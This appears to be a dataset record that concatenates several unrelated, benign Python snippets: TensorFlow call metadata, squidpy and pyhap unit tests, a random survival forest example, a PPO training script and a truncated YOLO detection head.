] | [((196, 248), 'tensorflow.compat.v1.variable_scope', 'tf.compat.v1.variable_scope', (['"""nmf"""'], {'dtype': 'tf.float32'}), "('nmf', dtype=tf.float32)\n", (223, 248), True, 'import tensorflow as tf\n'), ((263, 282), 'tensorflow.device', 'tf.device', (['"""/cpu:0"""'], {}), "('/cpu:0')\n", (272, 282), True, 'import tensorflow as tf\n'), ((759, 809), 'tensorflow.nn.embedding_lookup', 'tf.nn.embedding_lookup', (['User_Embedding', 'user_input'], {}), '(User_Embedding, user_input)\n', (781, 809), True, 'import tensorflow as tf\n'), ((836, 886), 'tensorflow.nn.embedding_lookup', 'tf.nn.embedding_lookup', (['Item_Embedding', 'item_input'], {}), '(Item_Embedding, item_input)\n', (858, 886), True, 'import tensorflow as tf\n'), ((1526, 1545), 'tensorflow.device', 'tf.device', (['"""/gpu:0"""'], {}), "('/gpu:0')\n", (1535, 1545), True, 'import tensorflow as tf\n'), ((1593, 1646), 'tensorflow.split', 'tf.split', (['user_latent', '[embed_dim, layers[0] // 2]', '(1)'], {}), '(user_latent, [embed_dim, layers[0] // 2], 1)\n', (1601, 1646), True, 'import tensorflow as tf\n'), ((1710, 1763), 'tensorflow.split', 'tf.split', (['item_latent', '[embed_dim, layers[0] // 2]', '(1)'], {}), '(item_latent, [embed_dim, layers[0] // 2], 1)\n', (1718, 1763), True, 'import tensorflow as tf\n'), ((1805, 1848), 'tensorflow.multiply', 'tf.multiply', (['mf_user_latent', 'mf_item_latent'], {}), '(mf_user_latent, mf_item_latent)\n', (1816, 1848), True, 'import tensorflow as tf\n'), ((1874, 1922), 'tensorflow.concat', 'tf.concat', (['(mlp_user_latent, mlp_item_latent)', '(1)'], {}), '((mlp_user_latent, mlp_item_latent), 1)\n', (1883, 1922), True, 'import tensorflow as tf\n'), ((1941, 1966), 'tensorflow.matmul', 'tf.matmul', (['mlp_vector', 'W1'], {}), '(mlp_vector, W1)\n', (1950, 1966), True, 'import tensorflow as tf\n'), ((1987, 2002), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc1'], {}), '(fc1)\n', (1997, 2002), True, 'import tensorflow as tf\n'), ((2021, 2041), 'tensorflow.matmul', 'tf.matmul', (['relu1', 'W2'], {}), '(relu1, W2)\n', (2030, 2041), True, 'import tensorflow as tf\n'), ((2062, 2077), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc2'], {}), '(fc2)\n', (2072, 2077), True, 'import tensorflow as tf\n'), ((2096, 2116), 'tensorflow.matmul', 'tf.matmul', (['relu2', 'W3'], {}), '(relu2, W3)\n', (2105, 2116), True, 'import tensorflow as tf\n'), ((2137, 2152), 'tensorflow.nn.relu', 'tf.nn.relu', (['fc3'], {}), '(fc3)\n', (2147, 2152), True, 'import tensorflow as tf\n'), ((2181, 2213), 'tensorflow.concat', 'tf.concat', (['(mf_vector, relu3)', '(1)'], {}), '((mf_vector, relu3), 1)\n', (2190, 2213), True, 'import tensorflow as tf\n'), ((2297, 2357), 'tensorflow.nn.sigmoid_cross_entropy_with_logits', 'tf.nn.sigmoid_cross_entropy_with_logits', ([], {'logits': 'y', 'labels': 'y_'}), '(logits=y, labels=y_)\n', (2336, 2357), True, 'import tensorflow as tf\n'), ((2377, 2397), 'tensorflow.reduce_mean', 'tf.reduce_mean', (['loss'], {}), '(loss)\n', (2391, 2397), True, 'import tensorflow as tf\n'), ((2414, 2427), 'tensorflow.sigmoid', 'tf.sigmoid', (['y'], {}), '(y)\n', (2424, 2427), True, 'import tensorflow as tf\n'), ((2452, 2510), 'tensorflow.compat.v1.train.GradientDescentOptimizer', 'tf.compat.v1.train.GradientDescentOptimizer', (['learning_rate'], {}), '(learning_rate)\n', (2495, 2510), True, 'import tensorflow as tf\n'), ((2241, 2269), 'tensorflow.matmul', 'tf.matmul', (['concat_vector', 'W4'], {}), '(concat_vector, W4)\n', (2250, 2269), True, 'import tensorflow as tf\n'), ((434, 475), 'tensorflow.random_normal_initializer', 
'tf.random_normal_initializer', ([], {'stddev': '(0.01)'}), '(stddev=0.01)\n', (462, 475), True, 'import tensorflow as tf\n'), ((658, 699), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.01)'}), '(stddev=0.01)\n', (686, 699), True, 'import tensorflow as tf\n'), ((1001, 1041), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1029, 1041), True, 'import tensorflow as tf\n'), ((1156, 1196), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1184, 1196), True, 'import tensorflow as tf\n'), ((1311, 1351), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1339, 1351), True, 'import tensorflow as tf\n'), ((1470, 1510), 'tensorflow.random_normal_initializer', 'tf.random_normal_initializer', ([], {'stddev': '(0.1)'}), '(stddev=0.1)\n', (1498, 1510), True, 'import tensorflow as tf\n')] |
import pytest
from anndata import AnnData
from pandas.testing import assert_frame_equal
import numpy as np
from squidpy.gr import moran, ripley_k, co_occurrence
MORAN_K = "moranI"
def test_ripley_k(adata: AnnData):
"""Check ripley score and shape."""
ripley_k(adata, cluster_key="leiden")
# assert ripley in adata.uns
assert "ripley_k_leiden" in adata.uns.keys()
# assert clusters intersection
cat_ripley = set(adata.uns["ripley_k_leiden"]["leiden"].unique())
cat_adata = set(adata.obs["leiden"].cat.categories)
assert cat_ripley.isdisjoint(cat_adata) is False
def test_moran_seq_par(dummy_adata: AnnData):
"""Check whether moran results are the same for seq. and parallel computation."""
moran(dummy_adata)
dummy_adata.var["highly_variable"] = np.random.choice([True, False], size=dummy_adata.var_names.shape)
df = moran(dummy_adata, copy=True, n_jobs=1, seed=42, n_perms=50)
df_parallel = moran(dummy_adata, copy=True, n_jobs=2, seed=42, n_perms=50)
idx_df = df.index.values
idx_adata = dummy_adata[:, dummy_adata.var.highly_variable.values].var_names.values
assert MORAN_K in dummy_adata.uns.keys()
assert "pval_sim_fdr_bh" in dummy_adata.uns[MORAN_K]
assert dummy_adata.uns[MORAN_K].columns.shape == (4,)
# test highly variable
assert dummy_adata.uns[MORAN_K].shape != df.shape
# assert idx are sorted and contain same elements
assert not np.array_equal(idx_df, idx_adata)
np.testing.assert_array_equal(sorted(idx_df), sorted(idx_adata))
# check parallel gives same results
with pytest.raises(AssertionError, match=r'.*\(column name="pval_sim"\) are different.*'):
# because the seeds will be different, we don't expect the pval_sim values to be the same
assert_frame_equal(df, df_parallel)
@pytest.mark.parametrize("n_jobs", [1, 2])
def test_moran_reproducibility(dummy_adata: AnnData, n_jobs: int):
"""Check moran reproducibility results."""
moran(dummy_adata)
dummy_adata.var["highly_variable"] = np.random.choice([True, False], size=dummy_adata.var_names.shape)
# seed will work only when multiprocessing/loky
df_1 = moran(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)
df_2 = moran(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)
idx_df = df_1.index.values
idx_adata = dummy_adata[:, dummy_adata.var.highly_variable.values].var_names.values
assert MORAN_K in dummy_adata.uns.keys()
# assert fdr correction in adata.uns
assert "pval_sim_fdr_bh" in dummy_adata.uns[MORAN_K]
assert dummy_adata.uns[MORAN_K].columns.shape == (4,)
# test highly variable
assert dummy_adata.uns[MORAN_K].shape != df_1.shape
# assert idx are sorted and contain same elements
assert not np.array_equal(idx_df, idx_adata)
np.testing.assert_array_equal(sorted(idx_df), sorted(idx_adata))
# check parallel gives same results
assert_frame_equal(df_1, df_2)
def test_co_occurrence(adata: AnnData):
"""
check ripley score and shape
"""
co_occurrence(adata, cluster_key="leiden")
# assert occurrence in adata.uns
assert "leiden_co_occurrence" in adata.uns.keys()
assert "occ" in adata.uns["leiden_co_occurrence"].keys()
assert "interval" in adata.uns["leiden_co_occurrence"].keys()
# assert shapes
arr = adata.uns["leiden_co_occurrence"]["occ"]
assert arr.ndim == 3
assert arr.shape[2] == 49
assert arr.shape[1] == arr.shape[0] == adata.obs["leiden"].unique().shape[0]
# @pytest.mark.parametrize(("ys", "xs"), [(10, 10), (None, None), (10, 20)])
@pytest.mark.parametrize(("n_jobs", "n_splits"), [(1, 2), (2, 2)])
def test_co_occurrence_reproducibility(adata: AnnData, n_jobs: int, n_splits: int):
"""Check co_occurrence reproducibility results."""
arr_1, interval_1 = co_occurrence(adata, cluster_key="leiden", copy=True, n_jobs=n_jobs, n_splits=n_splits)
arr_2, interval_2 = co_occurrence(adata, cluster_key="leiden", copy=True, n_jobs=n_jobs, n_splits=n_splits)
np.testing.assert_array_equal(sorted(interval_1), sorted(interval_2))
np.testing.assert_allclose(arr_1, arr_2)
| [
"pandas.testing.assert_frame_equal",
"squidpy.gr.co_occurrence",
"numpy.testing.assert_allclose",
"pytest.raises",
"squidpy.gr.ripley_k",
"numpy.random.choice",
"numpy.array_equal",
"pytest.mark.parametrize",
"squidpy.gr.moran"
] | [((1825, 1866), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""n_jobs"""', '[1, 2]'], {}), "('n_jobs', [1, 2])\n", (1848, 1866), False, 'import pytest\n'), ((3614, 3679), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (["('n_jobs', 'n_splits')", '[(1, 2), (2, 2)]'], {}), "(('n_jobs', 'n_splits'), [(1, 2), (2, 2)])\n", (3637, 3679), False, 'import pytest\n'), ((265, 302), 'squidpy.gr.ripley_k', 'ripley_k', (['adata'], {'cluster_key': '"""leiden"""'}), "(adata, cluster_key='leiden')\n", (273, 302), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((738, 756), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {}), '(dummy_adata)\n', (743, 756), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((798, 863), 'numpy.random.choice', 'np.random.choice', (['[True, False]'], {'size': 'dummy_adata.var_names.shape'}), '([True, False], size=dummy_adata.var_names.shape)\n', (814, 863), True, 'import numpy as np\n'), ((873, 933), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': '(1)', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=1, seed=42, n_perms=50)\n', (878, 933), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((952, 1012), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': '(2)', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=2, seed=42, n_perms=50)\n', (957, 1012), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((1985, 2003), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {}), '(dummy_adata)\n', (1990, 2003), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((2045, 2110), 'numpy.random.choice', 'np.random.choice', (['[True, False]'], {'size': 'dummy_adata.var_names.shape'}), '([True, False], size=dummy_adata.var_names.shape)\n', (2061, 2110), True, 'import numpy as np\n'), ((2174, 2239), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': 'n_jobs', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)\n', (2179, 2239), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((2251, 2316), 'squidpy.gr.moran', 'moran', (['dummy_adata'], {'copy': '(True)', 'n_jobs': 'n_jobs', 'seed': '(42)', 'n_perms': '(50)'}), '(dummy_adata, copy=True, n_jobs=n_jobs, seed=42, n_perms=50)\n', (2256, 2316), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((2938, 2968), 'pandas.testing.assert_frame_equal', 'assert_frame_equal', (['df_1', 'df_2'], {}), '(df_1, df_2)\n', (2956, 2968), False, 'from pandas.testing import assert_frame_equal\n'), ((3064, 3106), 'squidpy.gr.co_occurrence', 'co_occurrence', (['adata'], {'cluster_key': '"""leiden"""'}), "(adata, cluster_key='leiden')\n", (3077, 3106), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((3843, 3934), 'squidpy.gr.co_occurrence', 'co_occurrence', (['adata'], {'cluster_key': '"""leiden"""', 'copy': '(True)', 'n_jobs': 'n_jobs', 'n_splits': 'n_splits'}), "(adata, cluster_key='leiden', copy=True, n_jobs=n_jobs,\n n_splits=n_splits)\n", (3856, 3934), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), ((3955, 4046), 'squidpy.gr.co_occurrence', 'co_occurrence', (['adata'], {'cluster_key': '"""leiden"""', 'copy': '(True)', 'n_jobs': 'n_jobs', 'n_splits': 'n_splits'}), "(adata, cluster_key='leiden', copy=True, n_jobs=n_jobs,\n n_splits=n_splits)\n", (3968, 4046), False, 'from squidpy.gr import moran, ripley_k, co_occurrence\n'), 
((4122, 4162), 'numpy.testing.assert_allclose', 'np.testing.assert_allclose', (['arr_1', 'arr_2'], {}), '(arr_1, arr_2)\n', (4148, 4162), True, 'import numpy as np\n'), ((1442, 1475), 'numpy.array_equal', 'np.array_equal', (['idx_df', 'idx_adata'], {}), '(idx_df, idx_adata)\n', (1456, 1475), True, 'import numpy as np\n'), ((1594, 1684), 'pytest.raises', 'pytest.raises', (['AssertionError'], {'match': '""".*\\\\(column name="pval_sim"\\\\) are different.*"""'}), '(AssertionError, match=\n \'.*\\\\(column name="pval_sim"\\\\) are different.*\')\n', (1607, 1684), False, 'import pytest\n'), ((1786, 1821), 'pandas.testing.assert_frame_equal', 'assert_frame_equal', (['df', 'df_parallel'], {}), '(df, df_parallel)\n', (1804, 1821), False, 'from pandas.testing import assert_frame_equal\n'), ((2791, 2824), 'numpy.array_equal', 'np.array_equal', (['idx_df', 'idx_adata'], {}), '(idx_df, idx_adata)\n', (2805, 2824), True, 'import numpy as np\n')] |
"""
Tests for pyhap.characteristic
"""
import uuid
from unittest import mock
import pytest
import pyhap.characteristic as characteristic
from pyhap.characteristic import Characteristic
PROPERTIES = {
"Format": characteristic.HAP_FORMAT.INT,
"Permissions": [characteristic.HAP_PERMISSIONS.READ]
}
def get_char(props, valid=None, min_value=None, max_value=None):
if valid is not None:
props["ValidValues"] = valid
if min_value is not None:
props["minValue"] = min_value
if max_value is not None:
props["maxValue"] = max_value
c = Characteristic(display_name="Test Char",
type_id=uuid.uuid1(),
properties=props)
return c
def test_default_value():
char = get_char(PROPERTIES.copy())
assert (characteristic.HAP_FORMAT.DEFAULT[PROPERTIES["Format"]]
== char.value)
def test_default_valid_value():
valid_values = {"foo": 2, "bar": 3}
char = get_char(PROPERTIES.copy(), valid=valid_values)
assert char.value in valid_values.values()
def test_set_value():
char = get_char(PROPERTIES.copy())
new_value = 3
char.set_value(new_value)
assert char.value == new_value
def test_set_value_valid_values():
valid_values = {"foo": 2, "bar": 3, }
char = get_char(PROPERTIES.copy(), valid=valid_values)
with pytest.raises(ValueError):
char.set_value(4)
def test_set_value_callback_toggle():
char = get_char(PROPERTIES.copy())
char.setter_callback = mock.Mock()
char.set_value(3, should_callback=False)
assert not char.setter_callback.called
char.set_value(3, should_callback=True)
assert char.setter_callback.called
def test_override_properties_properties():
new_properties = {'minValue': 10, 'maxValue': 20, 'step': 1}
char = get_char(PROPERTIES.copy(), min_value=0, max_value=1)
char.override_properties(properties=new_properties)
assert char.properties['minValue'] == new_properties['minValue']
assert char.properties['maxValue'] == new_properties['maxValue']
assert char.properties['step'] == new_properties['step']
def test_override_properties_valid_values():
new_valid_values = {'foo2': 2, 'bar2': 3}
char = get_char(PROPERTIES.copy(), valid={'foo': 1, 'bar': 2})
char.override_properties(valid_values=new_valid_values)
assert char.properties['ValidValues'] == new_valid_values
def test_get_hap_value():
max_value = 5
raw_value = 6
char = get_char(PROPERTIES.copy(), max_value=max_value)
char.set_value(raw_value, should_notify=False)
assert char.value == raw_value
assert char.get_hap_value() == max_value
def test_notify():
char = get_char(PROPERTIES.copy())
broker_mock = mock.Mock()
char.broker = broker_mock
notify_value = 3
expected = {
"type_id": char.type_id,
"value": notify_value,
}
char.value = notify_value
char.notify()
assert broker_mock.publish.called
broker_mock.publish.assert_called_with(expected, char)
def test_notify_except_no_broker():
char = get_char(PROPERTIES.copy())
with pytest.raises(characteristic.NotConfiguredError):
char.notify()
| [
"uuid.uuid1",
"pytest.raises",
"unittest.mock.Mock"
] | [((1509, 1520), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (1518, 1520), False, 'from unittest import mock\n'), ((2733, 2744), 'unittest.mock.Mock', 'mock.Mock', ([], {}), '()\n', (2742, 2744), False, 'from unittest import mock\n'), ((1351, 1376), 'pytest.raises', 'pytest.raises', (['ValueError'], {}), '(ValueError)\n', (1364, 1376), False, 'import pytest\n'), ((3113, 3161), 'pytest.raises', 'pytest.raises', (['characteristic.NotConfiguredError'], {}), '(characteristic.NotConfiguredError)\n', (3126, 3161), False, 'import pytest\n'), ((652, 664), 'uuid.uuid1', 'uuid.uuid1', ([], {}), '()\n', (662, 664), False, 'import uuid\n')] |
from random_survival_forest import RandomSurvivalForest, concordance_index
from lifelines import datasets
from sklearn.model_selection import train_test_split
import time
rossi = datasets.load_rossi()
# Attention: duration column must be index 0, event column index 1 in y
y = rossi.loc[:, ["arrest", "week"]]
X = rossi.drop(["arrest", "week"], axis=1)
X, X_test, y, y_test = train_test_split(X, y, test_size=0.25, random_state=10)
print("RSF")
start_time = time.time()
rsf = RandomSurvivalForest(n_estimators=20, n_jobs=-1, min_leaf=10)
rsf = rsf.fit(X, y)
print("--- %s seconds ---" % (time.time() - start_time))
y_pred = rsf.predict(X_test)
c_val = concordance_index(y_time=y_test["week"], y_pred=y_pred, y_event=y_test["arrest"])
print("C-index", round(c_val, 3))
| [
"random_survival_forest.concordance_index",
"sklearn.model_selection.train_test_split",
"time.time",
"random_survival_forest.RandomSurvivalForest",
"lifelines.datasets.load_rossi"
] | [((180, 201), 'lifelines.datasets.load_rossi', 'datasets.load_rossi', ([], {}), '()\n', (199, 201), False, 'from lifelines import datasets\n'), ((377, 432), 'sklearn.model_selection.train_test_split', 'train_test_split', (['X', 'y'], {'test_size': '(0.25)', 'random_state': '(10)'}), '(X, y, test_size=0.25, random_state=10)\n', (393, 432), False, 'from sklearn.model_selection import train_test_split\n'), ((460, 471), 'time.time', 'time.time', ([], {}), '()\n', (469, 471), False, 'import time\n'), ((478, 539), 'random_survival_forest.RandomSurvivalForest', 'RandomSurvivalForest', ([], {'n_estimators': '(20)', 'n_jobs': '(-1)', 'min_leaf': '(10)'}), '(n_estimators=20, n_jobs=-1, min_leaf=10)\n', (498, 539), False, 'from random_survival_forest import RandomSurvivalForest, concordance_index\n'), ((654, 740), 'random_survival_forest.concordance_index', 'concordance_index', ([], {'y_time': "y_test['week']", 'y_pred': 'y_pred', 'y_event': "y_test['arrest']"}), "(y_time=y_test['week'], y_pred=y_pred, y_event=y_test[\n 'arrest'])\n", (671, 740), False, 'from random_survival_forest import RandomSurvivalForest, concordance_index\n'), ((590, 601), 'time.time', 'time.time', ([], {}), '()\n', (599, 601), False, 'import time\n')] |
import gym
import numpy as np
import torch
import torch.optim as optim
from utils_main import make_env, save_files
from neural_network import ActorCritic
from ppo_method import ppo
from common.multiprocessing_env import SubprocVecEnv
from itertools import count
use_cuda = torch.cuda.is_available()
device = torch.device("cuda" if use_cuda else "cpu")
num_envs = 2
env_name = "CustomEnv-v0"
envs = [make_env(env_name) for i in range(num_envs)]
envs = SubprocVecEnv(envs)
num_inputs = envs.observation_space.shape[0]
num_outputs = envs.action_space.shape[0]
# Hyper params:
hidden_size = 400
lr = 3e-6
num_steps = 20
mini_batch_size = 5
ppo_epochs = 4
threshold_reward = -0.01
model = ActorCritic(num_inputs, num_outputs, hidden_size).to(device)
env = gym.make(env_name)
my_ppo = ppo(model, env)
optimizer = optim.Adam(model.parameters(), lr=lr)
max_frames = 15_000_000
frame_idx = 0
test_rewards = []
save_iteration = 1000
model_save_iteration = 1000
state = envs.reset()
early_stop = False
def trch_ft_device(input, device):
output = torch.FloatTensor(input).to(device)
return output
saver_model = save_files()
while frame_idx < max_frames and not early_stop:
log_probs = []
values = []
states = []
actions = []
rewards = []
masks = []
entropy = 0
for _ in range(num_steps):
state = trch_ft_device(state, device)
dist, value = model(state)
action = dist.sample()
next_state, reward, done, _ = envs.step(action.cpu().numpy())
log_prob = dist.log_prob(action)
entropy += dist.entropy().mean()
# appending
log_probs.append(log_prob)
values.append(value)
rewards.append(torch.FloatTensor(reward).unsqueeze(1).to(device))
masks.append(torch.FloatTensor(1 - done).unsqueeze(1).to(device))
states.append(state)
actions.append(action)
# next iteration init.
state = next_state
frame_idx += 1
if frame_idx % save_iteration == 0:
test_reward = np.mean([my_ppo.test_env() for _ in range(num_envs)])
test_rewards.append(test_reward)
# plot(frame_idx, test_rewards)
if test_reward > threshold_reward:
early_stop = True
if frame_idx % model_save_iteration == 0:
saver_model.model_save(model)
next_state = trch_ft_device(next_state, device)
_, next_value = model(next_state)
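    # bootstrap the final state's value and compute GAE returns for the collected rollout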
returns = my_ppo.compute_gae(next_value, rewards, masks, values)
returns = torch.cat(returns).detach()
log_probs = torch.cat(log_probs).detach()
values = torch.cat(values).detach()
states = torch.cat(states)
actions = torch.cat(actions)
advantage = returns - values
my_ppo.ppo_update(ppo_epochs, mini_batch_size, states, actions, log_probs, returns, advantage, optimizer)
max_expert_num = 50000
num_steps = 0
expert_traj = []
# building an episode based on the current model.
for i_episode in count():
state = env.reset()
done = False
total_reward = 0
while not done:
state = torch.FloatTensor(state).unsqueeze(0).to(device)
dist, _ = model(state)
action = dist.sample().cpu().numpy()[0]
next_state, reward, done, _ = env.step(action)
state = next_state
total_reward += reward
expert_traj.append(np.hstack([state, action]))
num_steps += 1
print("episode:", i_episode, "reward:", total_reward)
if num_steps >= max_expert_num:
break
expert_traj = np.stack(expert_traj)
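# each row of expert_traj is a concatenated [state, action] pair, shape (num_steps, obs_dim + act_dim)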
print()
print(expert_traj.shape)
print()
np.save("expert_traj.npy", expert_traj)
| [
"numpy.stack",
"ppo_method.ppo",
"utils_main.save_files",
"gym.make",
"common.multiprocessing_env.SubprocVecEnv",
"numpy.save",
"neural_network.ActorCritic",
"torch.FloatTensor",
"torch.cat",
"itertools.count",
"numpy.hstack",
"torch.cuda.is_available",
"torch.device",
"utils_main.make_env"
] | [((274, 299), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (297, 299), False, 'import torch\n'), ((309, 352), 'torch.device', 'torch.device', (["('cuda' if use_cuda else 'cpu')"], {}), "('cuda' if use_cuda else 'cpu')\n", (321, 352), False, 'import torch\n'), ((456, 475), 'common.multiprocessing_env.SubprocVecEnv', 'SubprocVecEnv', (['envs'], {}), '(envs)\n', (469, 475), False, 'from common.multiprocessing_env import SubprocVecEnv\n'), ((760, 778), 'gym.make', 'gym.make', (['env_name'], {}), '(env_name)\n', (768, 778), False, 'import gym\n'), ((789, 804), 'ppo_method.ppo', 'ppo', (['model', 'env'], {}), '(model, env)\n', (792, 804), False, 'from ppo_method import ppo\n'), ((1121, 1133), 'utils_main.save_files', 'save_files', ([], {}), '()\n', (1131, 1133), False, 'from utils_main import make_env, save_files\n'), ((2985, 2992), 'itertools.count', 'count', ([], {}), '()\n', (2990, 2992), False, 'from itertools import count\n'), ((3537, 3558), 'numpy.stack', 'np.stack', (['expert_traj'], {}), '(expert_traj)\n', (3545, 3558), True, 'import numpy as np\n'), ((3600, 3639), 'numpy.save', 'np.save', (['"""expert_traj.npy"""', 'expert_traj'], {}), "('expert_traj.npy', expert_traj)\n", (3607, 3639), True, 'import numpy as np\n'), ((404, 422), 'utils_main.make_env', 'make_env', (['env_name'], {}), '(env_name)\n', (412, 422), False, 'from utils_main import make_env, save_files\n'), ((2668, 2685), 'torch.cat', 'torch.cat', (['states'], {}), '(states)\n', (2677, 2685), False, 'import torch\n'), ((2700, 2718), 'torch.cat', 'torch.cat', (['actions'], {}), '(actions)\n', (2709, 2718), False, 'import torch\n'), ((693, 742), 'neural_network.ActorCritic', 'ActorCritic', (['num_inputs', 'num_outputs', 'hidden_size'], {}), '(num_inputs, num_outputs, hidden_size)\n', (704, 742), False, 'from neural_network import ActorCritic\n'), ((1051, 1075), 'torch.FloatTensor', 'torch.FloatTensor', (['input'], {}), '(input)\n', (1068, 1075), False, 'import torch\n'), ((2541, 2559), 'torch.cat', 'torch.cat', (['returns'], {}), '(returns)\n', (2550, 2559), False, 'import torch\n'), ((2585, 2605), 'torch.cat', 'torch.cat', (['log_probs'], {}), '(log_probs)\n', (2594, 2605), False, 'import torch\n'), ((2628, 2645), 'torch.cat', 'torch.cat', (['values'], {}), '(values)\n', (2637, 2645), False, 'import torch\n'), ((3361, 3387), 'numpy.hstack', 'np.hstack', (['[state, action]'], {}), '([state, action])\n', (3370, 3387), True, 'import numpy as np\n'), ((3093, 3117), 'torch.FloatTensor', 'torch.FloatTensor', (['state'], {}), '(state)\n', (3110, 3117), False, 'import torch\n'), ((1706, 1731), 'torch.FloatTensor', 'torch.FloatTensor', (['reward'], {}), '(reward)\n', (1723, 1731), False, 'import torch\n'), ((1778, 1805), 'torch.FloatTensor', 'torch.FloatTensor', (['(1 - done)'], {}), '(1 - done)\n', (1795, 1805), False, 'import torch\n')] |
import tensorflow as tf
from .config import cfg
class YoloHead(tf.keras.layers.Layer):
def __init__(self, grid_size, classes, strides, anchors, xyscale, i):
super().__init__()
self.grid_size = grid_size
self.classes = classes
self.strides = strides
self.anchors = anchors
self.xyscale = xyscale
self.i = i
def call(self, feature_map):
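        # feature_map is the raw prediction for one scale: (batch, grid, grid, 3 * (5 + classes))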
batch_size = tf.shape(feature_map)[0]
conv_output = tf.reshape(
feature_map,
(batch_size, self.grid_size, self.grid_size, 3, 5 + self.classes),
)
bbox_xy, bbox_wh, detection_conf, classes_prob = tf.split(
conv_output, (2, 2, 1, self.classes), axis=-1
)
xy_grid = tf.meshgrid(
tf.range(self.grid_size), tf.range(self.grid_size)
)
xy_grid = tf.expand_dims(tf.stack(xy_grid, axis=-1), axis=2)
xy_grid = tf.tile(
tf.expand_dims(xy_grid, axis=0),
[batch_size, 1, 1, 3, 1],
)
xy_grid = tf.cast(xy_grid, tf.float32)
bbox_xy_sigmoid = tf.sigmoid(bbox_xy)
detection_conf_sigmoid = tf.sigmoid(detection_conf)
classes_prob_sigmoid = tf.sigmoid(classes_prob)
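        # decode grid-relative offsets into box centers/sizes in input-image pixels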
prediction_xy = (
(bbox_xy_sigmoid * self.xyscale[self.i])
- 0.5 * (self.xyscale[self.i] - 1)
+ xy_grid
) * self.strides[self.i]
prediction_wh = tf.exp(bbox_wh) * self.anchors[self.i]
prediction_xywh = tf.concat([prediction_xy, prediction_wh], axis=-1)
prediction_prob = detection_conf_sigmoid * classes_prob_sigmoid
prediction_xywh = tf.reshape(prediction_xywh, (batch_size, -1, 4))
prediction_prob = tf.reshape(
prediction_prob, (batch_size, -1, self.classes)
)
return prediction_xywh, prediction_prob
class FilterLayer(tf.keras.layers.Layer):
def __init__(self, input_size, score_threshold=0.4):
super().__init__()
self.input_size = input_size
self.score_threshold = score_threshold
def call(self, bounding_boxes, scores):
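        # keep boxes whose best class score passes the threshold and convert xywh to normalized (ymin, xmin, ymax, xmax)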
input_size = self.input_size
score_threshold = self.score_threshold
bounding_boxes = tf.concat(bounding_boxes, axis=1)
scores = tf.concat(scores, axis=1)
scores_max = tf.math.reduce_max(scores, axis=-1)
mask = scores_max >= score_threshold
class_boxes = tf.boolean_mask(bounding_boxes, mask)
pred_conf = tf.boolean_mask(scores, mask)
class_boxes = tf.reshape(
class_boxes, [tf.shape(scores)[0], -1, tf.shape(class_boxes)[-1]]
)
pred_conf = tf.reshape(
pred_conf, [tf.shape(scores)[0], -1, tf.shape(pred_conf)[-1]]
)
box_xy, box_wh = tf.split(class_boxes, (2, 2), axis=-1)
input_size = tf.cast(input_size, dtype=tf.float32)
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
box_mins = (box_yx - (box_hw / 2.0)) / input_size
box_maxes = (box_yx + (box_hw / 2.0)) / input_size
boxes = tf.concat(
[
box_mins[..., 0:1],
box_mins[..., 1:2],
box_maxes[..., 0:1],
box_maxes[..., 1:2],
],
axis=-1,
)
predictions = tf.concat([boxes, pred_conf], axis=-1)
return predictions
def dense_prediction(feature_maps, classes, tiny=False):
bbox_tensors = []
prob_tensors = []
if tiny:
yolo_head_1 = YoloHead(
cfg.INPUT_SIZE // 16,
classes,
cfg.STRIDES_TINY,
cfg.ANCHORS_TINY,
cfg.XYSCALE_TINY,
0,
)(feature_maps[0])
bbox_tensors.append(yolo_head_1[0])
prob_tensors.append(yolo_head_1[1])
yolo_head_2 = YoloHead(
cfg.INPUT_SIZE // 32,
classes,
cfg.STRIDES_TINY,
cfg.ANCHORS_TINY,
cfg.XYSCALE_TINY,
1,
)(feature_maps[1])
bbox_tensors.append(yolo_head_2[0])
prob_tensors.append(yolo_head_2[1])
else:
yolo_head_1 = YoloHead(
cfg.INPUT_SIZE // 8,
classes,
cfg.STRIDES,
cfg.ANCHORS,
cfg.XYSCALE,
0,
)(feature_maps[0])
bbox_tensors.append(yolo_head_1[0])
prob_tensors.append(yolo_head_1[1])
yolo_head_2 = YoloHead(
cfg.INPUT_SIZE // 16,
classes,
cfg.STRIDES,
cfg.ANCHORS,
cfg.XYSCALE,
1,
)(feature_maps[1])
bbox_tensors.append(yolo_head_2[0])
prob_tensors.append(yolo_head_2[1])
yolo_head_3 = YoloHead(
cfg.INPUT_SIZE // 32,
classes,
cfg.STRIDES,
cfg.ANCHORS,
cfg.XYSCALE,
2,
